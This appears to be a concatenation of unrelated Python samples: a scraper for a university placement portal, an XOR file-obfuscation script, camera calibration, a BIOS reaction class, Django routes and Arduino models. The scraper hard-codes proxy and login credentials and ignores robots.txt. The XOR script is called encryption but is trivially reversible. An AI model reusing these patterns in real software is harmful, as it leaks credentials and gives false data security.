    name = factory.Faker("name")
    authorization_grant_type = "password"
    client_type = "confidential"
    user = factory.SubFactory(SuperUserFactory)
|
StarcoderdataPython
|
1728939
|
<gh_stars>1-10
import mechanize
import http.cookiejar
from bs4 import BeautifulSoup as bs
import json
import pandas as pd
# Browser
# --- mechanize browser configured to masquerade as a normal Chrome client ---
br = mechanize.Browser()
# Cookie Jar
cj = http.cookiejar.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# SECURITY NOTE(review): proxy credentials and the login username below are
# hard-coded (and committed); move them to environment variables or a config
# file before sharing this script.
br.set_proxies({"http": "s.barnwal:[email protected]:3128"})
br.addheaders = [('User-agent', 'Chrome')]
# The site we will navigate into, handling it's session
br.open('https://online.iitg.ernet.in/tnp/')
# Select the second (index one) form (the first form is a search query box)
br.select_form(nr=0)
# User credentials
br.form['username'] = 's.barnwal'
br.form['password'] = ''
# Login
br.submit()
# open all jobs list
page = br.open('https://online.iitg.ernet.in/tnp/student/job_all_list.jsp')
# open in Beautiful soup
soup = bs(page, "lxml")
all_tables=soup.find_all('table')
# NOTE(review): 'taable-responsive' looks like a typo, but the class string
# must match the site's actual markup -- verify against the page source
# before "fixing" it.
right_table=soup.find('table', class_='table taable-responsive table-hover')
#start storing information
#storage containers
# one parallel list per output column of the final DataFrame
company = []
designation = []
profile = []
links = []
eligibility10 = []
eligibility12 = []
bdesCTC = []
btechCTC = []
mdesCTC = []
mtechCTC = []
maCTC = []
mscCTC = []
phdCTC = []
msrCTC = []
# CTC lists in the fixed row order used by the site's salary table
allCTC = [bdesCTC, btechCTC, mdesCTC, mtechCTC, maCTC, mscCTC, phdCTC, msrCTC]
resumeShortlist = []
techTest = []
aptiTest = []
gd = []
eligibleDepts = []
# main code
# For each job row in the listing table: record the summary columns, then
# follow the job's detail link and scrape eligibility, CTC per programme,
# selection-process flags, and eligible departments.
for row in right_table.find_all("tr"):
    cells = row.find_all("td")
    if len(cells) == 6:
        company.append(cells[1].string.replace("\n", ""))
        designation.append(cells[2].string.replace("\n", ""))
        profile.append(cells[3].string.replace("\n", ""))
        link = cells[5].a['href']
        links.append(link)
        # find job details
        # open job link
        companyLink = "https://online.iitg.ernet.in/tnp/student/" + link
        companyPage = br.open(companyLink)
        companySoup = bs(companyPage, "lxml")
        # eligibity
        eligibilityTable = companySoup.select_one("#Eligibility table")
        for row in eligibilityTable.find_all("tr"):
            cells = row.find_all("td")
            if len(cells) == 4:
                eligibility10.append(cells[0].string)
                eligibility12.append(cells[1].string)
        # ctc
        # rows appear in the fixed programme order of allCTC; "0.00" means
        # the programme is not offered a package
        ctcTable = companySoup.select_one("#Salary_Details table")
        i = 0
        for row in ctcTable.find_all("tr"):
            cells = row.find_all("td")
            if len(cells) == 4:
                if cells[1].string == "0.00":
                    allCTC[i%len(allCTC)].append("NA")
                else:
                    allCTC[i%len(allCTC)].append(cells[1].string)
                i = i+1
        # shortlist from resume
        resume = companySoup.select_one("#Selection_Process > .row:nth-of-type(5) > .col-md-10")
        resumeShortlist.append(resume.string)
        # technical test
        tech = companySoup.select_one("#Selection_Process > .row:nth-of-type(6) > .col-md-10")
        techTest.append(tech.string)
        # aptitude test
        apti = companySoup.select_one("#Selection_Process > .row:nth-of-type(7) > .col-md-10")
        aptiTest.append(apti.string)
        # group discussion
        g = companySoup.select_one("#Selection_Process > .row:nth-of-type(12) > .col-md-10")
        gd.append(g.string)
        # eligible depts
        eligibleTable = companySoup.select_one("#Eligible_Programmes_and_Departments table")
        depts = {}
        for row in eligibleTable.find_all('tr'):
            cells = row.find_all('td')
            if len(cells) == 6:
                key = cells[1].string.replace("\n", "") + ", " + cells[3].string.replace("\n", "") + ", " + cells[4].string.replace("\n", "")
                depts[key] = cells[5].string
        # serialise the dict, then strip the chars '{', '"' and '}'
        # (NOTE: this reuses loop variable i from the CTC loop above)
        toReplace = '{""}'
        string = json.dumps(depts, sort_keys=True, indent=0)
        for i in toReplace:
            string = string.replace(i, '')
        eligibleDepts.append(string)
# make dataframe
# Assemble the parallel lists collected above into one row per job posting
# and dump everything to CSV.
final_dataframe = pd.DataFrame(
    {'Company Name': company,
     'Designation': designation,
     'Profile': profile,
     '10th %': eligibility10,
     '12th %': eligibility12,
     'CTC for B.Des': bdesCTC,
     'CTC for B.Tech': btechCTC,
     'CTC for M.Des': mdesCTC,
     'CTC for M.Tech': mtechCTC,
     'CTC for M.A.': maCTC,
     'CTC for M.Sc': mscCTC,
     'CTC for Ph.D.': phdCTC,
     'CTC for M.S(R)': msrCTC,
     'Resume shortlist': resumeShortlist,
     'Technical test': techTest,
     'Aptitude test': aptiTest,
     'Group discussion': gd,
     'Eligible departments': eligibleDepts
    })
# final_dataframe.to_excel("ccd.xlsx")
final_dataframe.to_csv(path_or_buf="boo.csv", index=False)
|
StarcoderdataPython
|
1658779
|
#!/usr/bin/python3
from random import randint
def randhex():
    """Return one random byte (uniform over 0..255) as a bytes object."""
    return bytes([randint(0, 255)])
def divider1(fname):
    """Split *fname* into two obfuscated halves.

    Writes two files next to the input:
      - ``fname + '.out1'``: real bytes at even offsets, random filler elsewhere
      - ``fname + '.out2'``: real bytes at odd offsets, random filler elsewhere
    Together the outputs contain every byte of the original, but each one
    alone reveals only half of them.

    Improvements over the original: files are managed with context managers
    (the input file and both outputs were previously left to GC / the input
    never explicitly closed until the end), and the two duplicated read
    loops are merged into a single pass.
    """
    divisor = 2
    with open(fname, 'rb') as src, \
            open(fname + '.out1', 'wb') as out1, \
            open(fname + '.out2', 'wb') as out2:
        for i, byte in enumerate(iter(lambda: src.read(1), b'')):
            # each output keeps the real byte on "its" parity and hides the
            # other parity behind random filler
            if i % divisor == 0:
                out1.write(byte)
                out2.write(randhex())
            else:
                out1.write(randhex())
                out2.write(byte)
def swapper1(fname):
    """XOR-obfuscate *fname* with a fixed one-byte key.

    Writes ``fname + '.out1'`` with every byte XORed against 0b10101010,
    and ``fname + '.out2'`` with the XOR applied twice -- i.e. a copy of
    the input, demonstrating that the transform is self-inverse.

    Improvement over the original: all three files are handled with a
    context manager so they are closed even if a read/write fails.
    """
    pivot = 0b10101010
    with open(fname, 'rb') as src, \
            open(fname + '.out1', 'wb') as enc_out, \
            open(fname + '.out2', 'wb') as dec_out:
        for byte in iter(lambda: src.read(1), b''):
            ec = encrypt(byte, pivot)
            enc_out.write(ec)
            # applying the same XOR again recovers the original byte
            dec_out.write(encrypt(ec, pivot))
def encrypt(_bytes, pivot):
    """XOR a single byte with *pivot*; returns a 1-byte bytes object."""
    assert len(_bytes) == 1
    return bytes([pivot ^ _bytes[0]])
def encrypt_file(fname, passphrase):
    """XOR-encrypt *fname* with a repeating key derived from *passphrase*.

    The passphrase's characters are concatenated bit-wise into one large
    integer key of ``keysize`` bytes; the file is processed in
    ``keysize``-byte chunks, each XORed byte-for-byte against the key.
    Output goes to ``fname + '.out1'``.  Running the function a second time
    on the output with the same passphrase restores the original data.
    """
    UNIT = 8  # 8 bits per byte
    bitkey = ''.join([bin(ord(c)).lstrip('0b').zfill(UNIT) for c in passphrase])
    keysize, remainder = divmod(len(bitkey), UNIT)
    assert remainder == 0
    pivot = int(bitkey, 2)
    key_in_bytes = convert_to_bytes(pivot, UNIT)
    with open(fname, 'rb') as src, open(fname + '.out1', 'wb') as dst:
        # BUG FIX: the original read the first chunk with keysize bytes but
        # every subsequent chunk with UNIT (8) bytes, so for passphrases
        # longer than 8 bytes only the first 8 key bytes were ever applied
        # past the first chunk.  Read keysize bytes consistently so the full
        # key covers every chunk (and the transform stays self-inverse).
        chunk = src.read(keysize)
        while chunk:
            dst.write(encrypt_mbitwise(chunk, key_in_bytes))
            chunk = src.read(keysize)
def convert_to_bytes(integer, bytes_size):
    """Return *integer* as big-endian bytes, zero-padded to *bytes_size* bytes.

    If the integer needs more than ``bytes_size * 8`` bits, the result is
    simply longer -- no truncation takes place (matching the original's
    zfill-based behaviour).
    """
    bit_string = format(integer, 'b').zfill(bytes_size * 8)
    return bytes(int(bit_string[pos:pos + 8], 2)
                 for pos in range(0, len(bit_string), 8))
def encrypt_mbitwise(bytes, key_in_bytes):
    """XOR *bytes* against *key_in_bytes* element-wise.

    The result is a bytearray truncated to the shorter input (zip
    semantics); applying the same key twice restores the original data.
    """
    out = bytearray()
    for data_byte, key_byte in zip(bytes, key_in_bytes):
        out.append(data_byte ^ key_byte)
    return out
def is_multiple_of_two(n):
    # NOTE(review): despite the name, this does NOT test evenness.  It
    # returns True iff n's binary representation has at most one '1' bit,
    # i.e. n is 0 or a power of two.  Only referenced from a commented-out
    # assertion above -- confirm intent before renaming.
    '''returns true if n is 0 or a power of two (popcount <= 1), not "even"'''
    return 0 <= bin(n).count('1') <= 1
if __name__=="__main__":
    # CLI entry point: XOR-encrypt the file named by the first argument
    # using a hard-coded passphrase.  Running the script again on the
    # resulting .out1 file decrypts it (XOR is self-inverse).
    import sys
    fname = sys.argv[1]
    encrypt_file(fname, '루이보스보리차!@#')
    #encrypt_file(fname, 'password')
    #encrypt_file(fname, '<PASSWORD>')
|
StarcoderdataPython
|
8174856
|
<gh_stars>1-10
import cv2
from cv2 import aruco
import numpy as np
import matplotlib.pyplot as plt
# Candidate calibration image sets.
# NOTE(review): `images` is assigned three times below; only the final
# board2/ list is actually used.  The board/ lists are kept as dead
# alternatives -- confirm before deleting.
images=[
    "board/0.jpg",
    "board/1.jpg",
    "board/2.jpg",
    "board/3.jpg",
    "board/4.jpg",
    "board/5.jpg",
    "board/6.jpg",
    "board/7.jpg",
    "board/8.jpg",
    "board/9.jpg",
    "board/10.jpg",
    "board/11.jpg",
    "board/12.jpg",
    "board/13.jpg",
    "board/14.jpg",
    "board/15.jpg",
    "board/16.jpg",
    "board/17.jpg",
    "board/18.jpg",
    "board/19.jpg",
    "board/20.jpg",
    "board/21.jpg",
    "board/22.jpg",
    "board/23.jpg",
]
# subset of the above with the far-away shots removed
close_images=[
    "board/0.jpg",
    "board/1.jpg",
    "board/6.jpg",
    "board/8.jpg",
    "board/9.jpg",
    "board/10.jpg",
    "board/11.jpg",
    "board/12.jpg",
    "board/13.jpg",
    "board/14.jpg",
    "board/15.jpg",
    "board/16.jpg",
    "board/17.jpg",
    "board/18.jpg",
    "board/19.jpg",
    "board/20.jpg",
    "board/21.jpg",
    "board/22.jpg",
    "board/23.jpg",
]
images=close_images
# final (effective) image set
images=[
    "board2/1.jpg",
    "board2/2.jpg",
    "board2/3.jpg",
    "board2/4.jpg",
    "board2/5.jpg",
    "board2/6.jpg",
    "board2/7.jpg",
]
aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_250)
# 8x5 Charuco board: 0.36 square side, 0.27 marker side (same units)
board = aruco.CharucoBoard_create(8, 5, 0.36, .27, aruco_dict)
#imboard = board.draw((2000, 2000))
#cv2.imwrite("chessboard.tiff", imboard)
def read_chessboards(images):
    """
    Charuco base pose estimation.

    For each image path in *images*: detect ArUco markers, refine their
    corners to sub-pixel accuracy (cv2.cornerSubPix mutates each corner
    array IN PLACE), then interpolate Charuco board corners.  Returns
    (allCorners, allIds, imsize), where imsize is the gray shape of the
    last processed image.  NOTE(review): raises NameError if *images* is
    empty (gray undefined) -- presumably never called that way.
    """
    print("POSE ESTIMATION STARTS:")
    allCorners = []
    allIds = []
    decimator = 0
    # SUB PIXEL CORNER DETECTION CRITERION
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.00001)
    for im in images:
        print("=> Processing image {0}".format(im))
        frame = cv2.imread(im)
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        corners, ids, rejectedImgPoints = cv2.aruco.detectMarkers(gray, aruco_dict)
        if len(corners)>0:
            # SUB PIXEL DETECTION
            for corner in corners:
                cv2.cornerSubPix(gray, corner,
                                 winSize = (3,3),
                                 zeroZone = (-1,-1),
                                 criteria = criteria)
            # keep frames yielding >3 interpolated Charuco corners; the
            # decimator%1==0 test currently accepts every such frame
            res2 = cv2.aruco.interpolateCornersCharuco(corners,ids,gray,board)
            if res2[1] is not None and res2[2] is not None and len(res2[1])>3 and decimator%1==0:
                allCorners.append(res2[1])
                allIds.append(res2[2])
        decimator+=1
    imsize = gray.shape
    return allCorners,allIds,imsize
# Collect Charuco corner detections from every calibration image.
allCorners,allIds,imsize=read_chessboards(images)
def calibrate_camera(allCorners,allIds,imsize):
    """
    Calibrates the camera using the detected corners.

    Returns (rms_error, camera_matrix, dist_coeffs, rvecs, tvecs) from
    cv2.aruco.calibrateCameraCharucoExtended, seeded with a rough
    intrinsic guess centred on the image.
    """
    print("CAMERA CALIBRATION")
    cameraMatrixInit = np.array([[ 1000.,    0., imsize[0]/2.],
                                 [    0., 1000., imsize[1]/2.],
                                 [    0.,    0.,           1.]])
    distCoeffsInit = np.zeros((5,1))
    flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO)
    (ret, camera_matrix, distortion_coefficients0,
     rotation_vectors, translation_vectors,
     stdDeviationsIntrinsics, stdDeviationsExtrinsics,
     perViewErrors) = cv2.aruco.calibrateCameraCharucoExtended(
                      charucoCorners=allCorners,
                      charucoIds=allIds,
                      board=board,
                      imageSize=imsize,
                      cameraMatrix=cameraMatrixInit,
                      distCoeffs=distCoeffsInit,
                      flags=flags,
                      # BUG FIX: the criteria type must combine the flags
                      # with + (or |).  The original used &, and
                      # TERM_CRITERIA_EPS & TERM_CRITERIA_COUNT == 0, which
                      # silently disabled both stopping conditions.
                      criteria=(cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
    return ret, camera_matrix, distortion_coefficients0, rotation_vectors, translation_vectors
# Run the calibration and report the results.
ret, mtx, dist, rvecs, tvecs = calibrate_camera(allCorners,allIds,imsize)
# BUG FIX: these were Python 2 print statements (`print ret`), which are a
# SyntaxError under Python 3; use the print() function (valid on both).
print(ret)
print(" ----------")
print(mtx)
print(" ----------")
print(dist)
i=2# select image id
# Show the raw image next to its undistorted version for a visual check.
plt.figure()
frame = cv2.imread(images[i])
img_undist = cv2.undistort(frame,mtx,dist,None)
plt.subplot(1,2,1)
plt.imshow(frame)
plt.title("Raw image")
plt.axis("off")
plt.subplot(1,2,2)
plt.imshow(img_undist)
plt.title("Corrected image")
plt.axis("off")
plt.show()
###################################################################
#Piere version: hard-coded calibration constants for a K16VGA sensor at
#several binned resolutions.
K16VGA_RESOLUTION = {"x": 2560, "y": 1920}
CAMERA_RESOLUTIONS = [1,2,3,4,5,6,7]
CAMERA_DISTORTION_COEFF = np.array(
    [[0.13086823, -0.44239733, 0.0004841, -0.00322714, 0.16996254]])
# First two intrinsic-matrix rows, valid at full 2560x1920 resolution
# (these scale linearly with the image size).
CAMERA_MATRIX_RESOLUTION_2560_1920 = np.array([
    [2.41523736e+03, 0.00000000e+00, 1.25128063e+03],
    [0.00000000e+00, 2.41690366e+03, 9.94791007e+02]])
# The last row is resolution independent.
CAMERA_MATRIX_RESOLUTION_INDEPENDANT = np.array([
    [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]
])
CAMERA_DATAS_AT_RESOLUTION = {
    camera_resolution: {
        "matrix": np.append(
            CAMERA_MATRIX_RESOLUTION_2560_1920 / (2.**i),
            CAMERA_MATRIX_RESOLUTION_INDEPENDANT, axis=0
        ),
        # BUG FIX: use // so the pixel dimensions stay integers under
        # Python 3 (plain / was integer division only under Python 2,
        # which this file originally targeted -- see the print statements).
        "image_size": (
            K16VGA_RESOLUTION["x"] // (2**i),
            K16VGA_RESOLUTION["y"] // (2**i)
        ),
        "fps": 5,
    }
    for i, camera_resolution in enumerate(CAMERA_RESOLUTIONS)
}
# BUG FIX: Python 2 print statement -> print() function.
print(CAMERA_DATAS_AT_RESOLUTION)
mtx = np.array([[1.20761868e+03, 0.00000000e+00, 6.25640315e+02],
                [0.00000000e+00, 1.20845183e+03, 4.97395504e+02],
                [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
|
StarcoderdataPython
|
6450881
|
class BiosModelReaction:
    """Read-only wrapper around a BIOS reaction JSON document.

    Exposes the reaction's identifiers and converts its left/right-hand
    stoichiometry lists into plain dicts (reactants negative, products
    positive).
    """

    def __init__(self, json, api=None, uid=None, id=None, model=None):
        # json: the decoded reaction document (a dict).  The uid/id/model
        # parameters are accepted for backward compatibility but unused.
        self.json_data = json
        self.api = api
        #self.database = database

    @property
    def id(self):
        """The reaction's primary identifier."""
        return self.json_data['id']

    @property
    def uid(self):
        """The reaction's BIOS-internal identifier."""
        return self.json_data['bios_id']

    @property
    def name(self):
        """Human-readable reaction name."""
        return self.json_data['name']

    def decode_stoich_value(self, v):
        """Parse a stoichiometric coefficient; None or blank string means 1."""
        # BUG FIX: compare against None with `is`, not `==` (PEP 8; `==`
        # can invoke arbitrary __eq__ implementations).
        if v is None or len(v.strip()) == 0:
            return 1
        else:
            return float(v)

    def get_stoichiometry(self):
        """Return {metabolite_id: coefficient}; reactant side is negated."""
        s = {}
        for o in self.json_data['bios_stoichiometry']['l']:
            s[o[0]] = -1 * self.decode_stoich_value(o[2])
        for o in self.json_data['bios_stoichiometry']['r']:
            s[o[0]] = self.decode_stoich_value(o[2])
        return s

    def get_cstoichiometry(self, metabolites):
        """Return {(metabolite_id, compartment): coefficient}.

        Entries whose id is missing from *metabolites* are skipped; the
        compartment is looked up as metabolites[id]['compartment'].
        """
        s = {}
        for o in self.json_data['bios_stoichiometry']['l']:
            if o[0] in metabolites:
                s[(o[0], metabolites[o[0]]['compartment'])] = -1 * self.decode_stoich_value(o[2])
        for o in self.json_data['bios_stoichiometry']['r']:
            if o[0] in metabolites:
                s[(o[0], metabolites[o[0]]['compartment'])] = self.decode_stoich_value(o[2])
        return s

    @property
    def cstoichiometry(self):
        """Like get_stoichiometry but keyed on (metabolite_id, '?') tuples.

        Blank string coefficients are normalised to '1' IN PLACE in the
        underlying json (behaviour kept from the original implementation).
        """
        cstoichiometry = {}
        if 'bios_stoichiometry' in self.json_data:
            for h in self.json_data['bios_stoichiometry']['l']:
                if type(h[2]) == str and len(h[2]) == 0:
                    h[2] = '1'
                cstoichiometry[(h[0], '?')] = -1 * float(h[2])
            for h in self.json_data['bios_stoichiometry']['r']:
                if type(h[2]) == str and len(h[2]) == 0:
                    h[2] = '1'
                cstoichiometry[(h[0], '?')] = float(h[2])
        return cstoichiometry
|
StarcoderdataPython
|
8192625
|
<reponame>rputh055/crawlzerotest
from django.conf.urls import url
from crawlzero import views
# SET THE NAMESPACE!
app_name = 'crawlzero'
# Be careful setting the name to just /login use userlogin instead!
# URL routes for the crawlzero app (registration, login, file upload);
# each is reversible as 'crawlzero:<name>'.
# NOTE(review): django.conf.urls.url is deprecated/removed in modern Django
# (use django.urls.re_path or path) -- left unchanged here.
urlpatterns=[
    url(r'^register/$',views.register,name='register'),
    url(r'^user_login/$',views.user_login,name='user_login'),
    url(r'^upload_file/$',views.upload_file,name='upload_file'),
]
|
StarcoderdataPython
|
6579616
|
from datetime import time
from typing import List, Optional
class Arduino:
    """An Arduino device instance, linked to a hardware template."""

    def __init__(self, id: int, name: str, template_id: int):
        self.name = name
        self.template_id = template_id
        self.__id = id

    @property
    def id(self) -> int:
        """Immutable identifier of this Arduino."""
        return self.__id
class Template:
    """A hardware template describing how many input/output pins a board has."""

    def __init__(self, id: int, name: str, nb_input_pins: int, nb_output_pins: int):
        self.name = name
        self.nb_input_pins = nb_input_pins
        self.nb_output_pins = nb_output_pins
        self.__id = id

    @property
    def id(self) -> int:
        """Immutable identifier of this template."""
        return self.__id
class OutputPin:
    """A single output pin (by number) belonging to a parent Arduino."""

    def __init__(self, id: int, number: int, parent_id: int):
        self.__id = id
        self.number = number
        self.parent_id = parent_id

    @property
    def id(self) -> int:
        """Immutable identifier of this pin."""
        return self.__id
class InputPin:
    """An input pin that fires actions, with multi-click timing configuration."""

    def __init__(self, id: int, number: int, action_ids: List[int], parent_id: int, time_between_clicks: float):
        self.__id = id
        self.number = number
        self.parent_id = parent_id
        self.action_ids = action_ids
        self.time_between_clicks = time_between_clicks

    @property
    def id(self) -> int:
        """Immutable identifier of this pin."""
        return self.__id
class Action:
    """Something that happens in response to a trigger.

    An ``Action`` groups a trigger with the output pins it drives, optional
    notifications, timing parameters and -- for dimmer/toggle variants --
    the master pins it consults.  All state is exposed through read-only
    properties.
    """

    def __init__(self,
                 id: int,
                 action_type: int,
                 trigger_id: int,
                 notification_ids: List[int],
                 delay: int,
                 timer: int,
                 output_pin_ids: List[int],
                 condition_id: Optional[int],
                 master_id: Optional[int],
                 click_number: int,
                 dimmer_speed: Optional[int],
                 cancel_on_button_release: Optional[bool],
                 dimmer_light_value: Optional[int],
                 master_dimmer_id: Optional[int]):
        """Create a new Action.

        Args:
            id: Identifier of this action.
            action_type: Kind of action (see src.button.domain.ActionType).
            trigger_id: Identifier of the trigger firing this action.
            notification_ids: Notifications sent by this action; may be empty.
            delay: Delay before the action executes.
            timer: Delay after which ON/OFF style actions are reverted.
            output_pin_ids: Output pins affected by this action.
            condition_id: Optional condition that must hold for the action.
            master_id: Master pin inspected to decide a TOGGLE's direction.
            click_number: Clicks required to activate a multi-click action.
            dimmer_speed: How fast the dimmer changes light intensity.
            cancel_on_button_release: If true, dimming stops as soon as the
                button is released.
            dimmer_light_value: -1 to restore the dimmer's last known value
                on switch-on, otherwise the fixed value to jump to.
            master_dimmer_id: Dimmer whose last known value is reused when
                switching this dimmer on.
        """
        # general
        self.__id = id
        self.__trigger_id = trigger_id
        self.__action_type = action_type
        self.__delay = delay
        self.__output_pin_ids = output_pin_ids
        self.__notification_ids = notification_ids
        self.__condition_id = condition_id
        self.__click_number = click_number
        # ON/OFF/ON_DIMMER/OFF_DIMMER
        self.__timer = timer
        # TOGGLE/TOGGLE_DIMMER
        self.__master_id = master_id
        # dimming behaviour
        self.__dimmer_speed = dimmer_speed
        self.__cancel_on_button_release = cancel_on_button_release
        # ON_DIMMER/TOGGLE_DIMMER
        self.__dimmer_light_value = dimmer_light_value
        self.__master_dimmer_id = master_dimmer_id

    @property
    def id(self) -> int:
        return self.__id

    @property
    def trigger_id(self) -> int:
        return self.__trigger_id

    @property
    def action_type(self) -> int:
        return self.__action_type

    @property
    def notification_ids(self) -> List[int]:
        return self.__notification_ids

    @property
    def delay(self) -> int:
        return self.__delay

    @property
    def output_pin_ids(self) -> List[int]:
        return self.__output_pin_ids

    @property
    def timer(self) -> int:
        return self.__timer

    @property
    def condition_id(self) -> Optional[int]:
        return self.__condition_id

    @property
    def master_id(self) -> Optional[int]:
        return self.__master_id

    @property
    def click_number(self) -> int:
        return self.__click_number

    @property
    def dimmer_speed(self) -> Optional[int]:
        return self.__dimmer_speed

    @property
    def cancel_on_button_release(self) -> Optional[bool]:
        return self.__cancel_on_button_release

    @property
    def dimmer_light_value(self) -> Optional[int]:
        return self.__dimmer_light_value

    @property
    def master_dimmer_id(self) -> Optional[int]:
        return self.__master_dimmer_id
class Trigger:
    """How an input event fires: its type plus an optional hold duration."""

    def __init__(self, id: int, trigger_type: int, seconds_down: Optional[int]):
        self.trigger_type = trigger_type
        self.seconds_down = seconds_down
        self.__id = id

    @property
    def id(self) -> int:
        """Immutable identifier of this trigger."""
        return self.__id
class Condition:
    """A guard that must hold before an action runs.

    Depending on *type* this is either a composite (an *operator* over
    *condition_ids*), an output-pin *status* check, or a time window
    between *from_time* and *to_time*.
    """

    def __init__(self, id: int, type: int, operator: Optional[int], condition_ids: Optional[List[int]],
                 output_pin_id: Optional[int], status: Optional[bool], from_time: Optional[time],
                 to_time: Optional[time]):
        self.__id = id
        self.type = type
        self.operator = operator
        self.condition_ids = condition_ids
        self.output_pin_id = output_pin_id
        self.status = status
        self.from_time = from_time
        self.to_time = to_time

    @property
    def id(self) -> int:
        """Immutable identifier of this condition."""
        return self.__id
class Notification:
    """A message (mail or push token based) sent when an action fires."""

    def __init__(self, id: int, message: str, notification_type: int, enabled: bool, subject: Optional[str],
                 mail_address: List[str], tokens: List[str]):
        self.__id = id
        self.message = message
        self.notification_type = notification_type
        self.enabled = enabled
        self.subject = subject
        # note: stored under attribute names that differ from the parameters
        self.emails = mail_address
        self.tokens = tokens

    @property
    def id(self) -> int:
        """Immutable identifier of this notification."""
        return self.__id
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.